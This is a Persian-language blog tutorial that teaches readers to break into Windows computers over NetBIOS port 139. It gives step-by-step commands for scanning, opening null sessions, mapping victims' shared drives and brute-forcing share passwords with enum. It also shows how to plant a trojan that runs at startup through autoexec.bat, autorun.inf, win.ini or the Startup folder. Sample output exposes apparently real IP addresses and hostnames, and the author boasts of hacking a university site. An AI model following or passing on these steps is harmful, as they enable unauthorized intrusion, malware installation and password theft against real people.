آموزش هک کردن به صورت حرفه اي
۱۳۸۵ دی ۱۹, سهشنبه ۱۰:۲۵ By Hamedan , In old vr site
آمورش های که تو عمر گرانبهایتان ندیده اید
ـ چگونه با پورت 139 صحبت كنيم ؟
۱- اولين کاري که ميکنيم اين است که براي پورت ۱۳۹ پورت اسکن ميکنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام ميدم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP
اين خروجي اعلام ميکند که پورت ۱۳۹ باز است. پس ميشود از اين ip استفاده کرد.
۲- حالا ميخوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق ميکند. کامنت پرامت را باز کرده و دستور زير را مينويسم:
nbtstat -A 217.218.84.29
دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامترهاي بسياري است که اگه ميخواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه کاري ميکنه و خروجي به چه صورتي است:
اين دستور به ip مورد نظر وصل ميشه و از اون ميخواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نميتونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
۳- در اين نتايج چيزي که به درد ميخوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نميتونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بيخيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه ميدهيم. حالا مينويسم:
net view 217.218.84.29
حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد
System error 5 has occurred.
Access is denied.
اين يعني نميتونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري ميتونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوزهاي سري NT جواب ميده. مينويسيد:
net use 217.218.84.29IPC$ "" /user:""
حالا چرا ميگن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد ميتونم دوباره دستور net view 217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:
Shared resources at 217.218.84.29
Share name Type Used as Comment
------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.
عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مينويسم.
۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما ميدونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز ميکنيد، يک سري آيکون ميبينيد که هر کدام اسمي دارند. مثلا :A براي فلاپي و و و تا ميرسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اينکار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب ميکنم و دستور زير را مينويسم:
net use L: 217.218.84.29SharedDocs
به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط ميگيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب ميشنوم:
The command completed successfully.
معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که ميتونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...
۵- وقتي کار تموم شد ميتونيد درايو رو حذف کنيد. براي اينکار ميتونين روي درايو رايتکليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور
net use /delete L:
استفاده کنيد.
ـ نكته تكنه !!
۱- يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29 که ip داراي اشتراک است و يا اينکه تايپ کنيد SharedDocsت217.218.84.29 که اصولا بايد جواب بده ( ولي من خودم تست نکردم اينو ).
۲- من دارم به صورت استاندارد کار ميکنم. بعدا خواهم گفت که چطوري ميتونيم وقتي تو بعضي از مراحل متوقف ميشيم، اونو دور بزنيم.
۳- NetBIOS فقط براي کلاينتها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه داريد يک کلاينت رو هک ميکنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه.
۵- روشهاي ديگري هم براي کار با NetBIOS هست که يکي از اون روشها استفاده از يک سري نرمافزارهاي خاص است که تو درس بعدي توضيح ميدم و نيز يک روش ديگه اعمال تغييرات در فايلهاي HOST و LMHOST و استفاده از find در سيستمعامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.
۶- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالت پيشفرض در کامپيوتر فعال است، معمولا مشکلي نيست.
ـ چگونه NetBios رو روي كامپيوتر خودمون فعال كنيم ؟
براي غيرفعال کردن NetBIOS در ويندوز با توجه به نوع آن ويندوز روشهاي مختلفي هست. جدول پاييني براي همين موضوع طراحي شده است:
Win 2000 | Win XP Home | Win XP Professional |
Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok | | Start > Programs > Administrative Tools > Local Security Settings > Local Policies > |
Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2 | ||
ميتونيد به کمک فايروال يا روتر پورتهاي زير را ببنديد: 135 TCP DCE/RPC Portmapper 137 TCP/UDP NetBIOS Name Service 138 TCP/UDP NetBIOS Datagram Service 139 TCP NetBIOS Session Service 445 TCP Microsoft-DS (Windows 2000 CIFS/SMB) |
۱- وقتي پورت ۱۳۹ رو ميبنديد، ديگه نميتونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در آوريد). پس وقتي که کسي رو ميخواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد.
۲- ميبينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.
۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روشهاي بالا، گزينهاي که مخالف گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشتهايم، شما Disable را انتخاب کنيد.
ـ چگونه از اين امكانات به اشتراك گذاشته شدهبراي اجراي يك ترجان استفاده كنيم
خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي ميکنم تو يکي از درسهاي آينده اونو توضيح بدم. ما اينجا ميخواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟
تروجان بهطور ساده برنامهاي اجرايي است، که ما براي طرف مقابل ميفرستيم و اگه طرف مقابل اونو اجرا کنه، ما ميتونيم کنترل سيستم اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح ميدم.
حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ :
روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload ميکنم به اون کامپيوتر و اسمي براش انتخاب ميکنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضيها ميکنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر ميآد و فايل رو دابل کليک ميکنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا ميشه نه کامپيوتر قرباني. پس ما فقط فايل رو ميفرستيم و منتظر ميمونيم که طرف مقابل اجرا کنه.
حالا چند روش رو مطرح ميکنم که در شرايط خاص حالتي رو ايجاد ميکنه که نيازي با دابلکليک توسط قرباني نباشد:
۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d: ewfolder باشد، سطري که اضافه ميکنيم به صورت زير است:
d:
ewfolderali.exe
در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.
۲- اگه به درايو C دسترسي داريد، ميتونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون تغيير دهيد) :
[autorun]
open=d:
ewfolderali.exe
۳- اگه به فولدر ويندوز دسترسي داريد، ميتونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:
run=d:
ewfolderali.exe
۵- اگه به فولدر ويندوز دسترسي داريد، ميتونيد تروجان رو به فولدر Start MenuStartup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست.
ـ ابزارهاي كمكي : 1.ابزارهاي خط فرماني
۱- enum :
اين برنامه را از اينجا داونلود کنيد. enum نرمافزاري با قابليتهاي فوقالعاده است. از جمله تواناييهايي که دارد، در مواردي است که کامپيوتر طرف مقابل براي اعمال sharing از ما پسورد بخواد. در اين موارد ميتونيم به کمک enum و ليستي از پسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم ( اصطلاحا cracking ) و شايد به نتيجه برسيم. ( اين موضوع را بعدا بيشتر توضيح مبدم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share هايي است که کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپ کردم، تا ليست اشتراکهاي آن ip خاص در آن لحظه رو بدست بيارم:
enum -S 217.218.84.29
و جواب شنيدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظه ميفرماييد که درايوهاي E و D و F و C و نيز SharedDocs و .. ليست شده است. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به null session نيست ).
۲- nbtscan :
اين برنامه را از اينجا داونلود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت که ميتونه تعداد زيادي ip رو همزمان تست کنه و ليست share ها رو بدست بياره. اين دقيقا راهحلي است براي سوالي که خيلي از شما دوستان پرسيده بودين. مثلا اگه بنويسم:
nbtscan -v -s : 195.219.49.0-30
که ليست اشتراکها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب ميشنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هايي که 20U را ميبينيد، يعني sharing رو ميشه استفاده کرد.
۳- winfo :
اينم از جمله برنامههايي است که بايد بگم آخر برنامه است!! از اينجا داونلود کنيد. البته توانايي تست تعداد زيادي ip رو نداره ولي وقتي يه ip رو تست ميکنه همهچي شو در رو ميکنه. (البته ميشه گفت همه اين کارها رو ميشه با enum هم انجام داد ). مثلا من دستور زير را تايپ کردم :
winfo 195.219.49.184 -n -v
و به نتايج زير رسيدم:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها ميتونين، share ها رو ببينيد.
۴- NAT :
اين برنامه را از اينجا داونلود کنيد. يکي از مهمترين کاربردهاي اون crack کردن پسورد sharing است ( مثل enum ). براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصله و بعد ip را مينويسيم. حتما تست کنيد و نتيجه رو ببينيد... ( تکليف براي خودتون )
۵- و ..
ـ ابزارهاي كمكي : 2.ابزارهاي گرافيكي
۱- netbrute :
اين برنامه را از اينجا داونلود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه ميکنم اگرچه به اندازه دو نرمافزار بعدي مشهور نيست. من نميخوام روش کار با اينو توضيح بدم چون خيلي تابلو ه! ضمنا اين نرمافزار داخل خودش يک پورت اسکنر هم داره که خيلي به درد ميخوره. حتما حتما حتما داونلود کنيد اينو و اونقدر انگولکش کنيد که سر در بيارين ازش. قرار نيست که هميچي رو من بهتون بگم !!
۲- Legion :
اگه بگم مشهورترين نرمافزار اسکن کردن پورت ۱۳۹ اين نرمافزاره، سخن گزافي نيست!! خيليها کشته مرده اون هستن ولي من زياد ازش خوشم نميآد. اما بايد قبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داوللود کنيد، اينجا رو کليک کنيد.
۳- DumpSec يا DumpACL :
اين هم خيلي معروفه. اگه خواستين ميتونين از اينجا داونلود کنيد.
ـ آيا چيزي راجه به اين پورتها مونده كه بحث نشده باشه ؟
بله!
۱- يه نرمافزاري هست به اسم pqwak که اينطوري که ميگن، اگه کامپيوتر مقابل ويندوز ۹۸ باشه، ميتونه پسورد اونو سه سوت در بياره. ( اين برنامه از نقطه ضعف ويندوز ۹۸ راجع به netbios استفاده ميکنه و اونو exploit ميکنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زياد به درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو کار کلاينتاش هم مونده، چه برسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه ميخواين پيدا کنيد.
۲- ما بحث استفاده از نقاط ضعف پورتها رو هنوز شروع نکردهايم و در مورد پورت ۱۳۹ هم همينطوره. به عنوان مثال روشهايي هست که پورت ۱۳۹ رو exploit کنيم و اون مراحلي که توش گير ميکرديم رو دور بزنيم.
_ نكاتي راجه به enum
خوب قبلا گفتم که enum نرمافزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا ميخوام دو کاربرد خاص از اونو براتون توضيح بدم:
۱- گرفتن password policy information :
در ويندوزهاي NT ميشود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکه حداقل طول پسورد و حداکثر اون چقدر باشه و ... براي اينکه اين policy رو بدست بياريد، از سويچ P استفاده ميکنيم. مثلا مينويسيم:
enum -P xxx.xxx.xxx.xxx
و جواب ميشنوم:
server: xxx.xxx.xxx.xxx
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.
خودتون که دارين ميبينين!
۲- استفاده از روش cracking براي پيدا کردن پسورد:
اگه با NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقتها (خصوصا در مورد سرورها) پسورد از ما سوال ميشه. (پسورد وقتي پرسيده ميشه که بخواهيم، مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري نميتونيد بکنيد. پس ما کاري که ميکنيم، اينه که يک سري پسورد را توسط enum تست ميکنيم که يکي جواب بده - يا اينکه نده !
اصولا تست کردن تعداد زيادي پسورد براي پيدا کردن پسورد درست رو crack کردن پسورد به روش brute force يا bf ميگن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده از روش bf مختص NetBIOS نيست و خيلي جاها استفاده ميشه. اينم بگم که استفاده از روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره...
حالا چيري ميخوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفاده ميکنن. براي پيدا کردن اين فايلها که اصطلاحا dictionary file ناميده ميشوند به صورت زير است:
الف) استفاده از ديکشنريهاي آماده مثل The Argon که مشهورترين ديکشنري کرکينگ ميباشد با حجمي حدود ۲۴ مگابايت!
ب) بعضي وقتها خودمون ميخواهيم يه ديکشنري بسازيم، در اين موارد کاري که ميکنيم اينه که از نرمافزارهاي سازنده ديکشنري استفاده ميکنيم. مثلا وقتي که شما ميدونيد که فلاني از پسوردهاي ۸ حرفي استفاده ميکنه و ... براي اينکار نرمافزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و PASSLIST.TXT GENERATOR و ..
حالا که يه فايل ديکشنري دارم ميتونم کار کرک پسورد NetBIOS رو شروع کنم. فرض کنيد که وقتي ميخوام Ali رو در يک ip به شماره xxx.xxx.xxx.xxx رو با يک فايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي اينکار استفاده ميکنيم، اينه:
enum -D -f "theargon.lst" -u "Adel" xxx.xxx.xxx.xxx
حالا enum مياد و تمام پسوردها رو تست ميکنه تا ايشالله به جواب برسه!
اينقدر که از enum تعريف کردم ديگه بسه! مشکلي که enum راجع به کرک پسورد داره اينه که خيلي کند کار ميکنه. ممکنه ساعتها وقت لازم باشه. راهحل چيه؟
0 نظرات:
ارسال یک نظر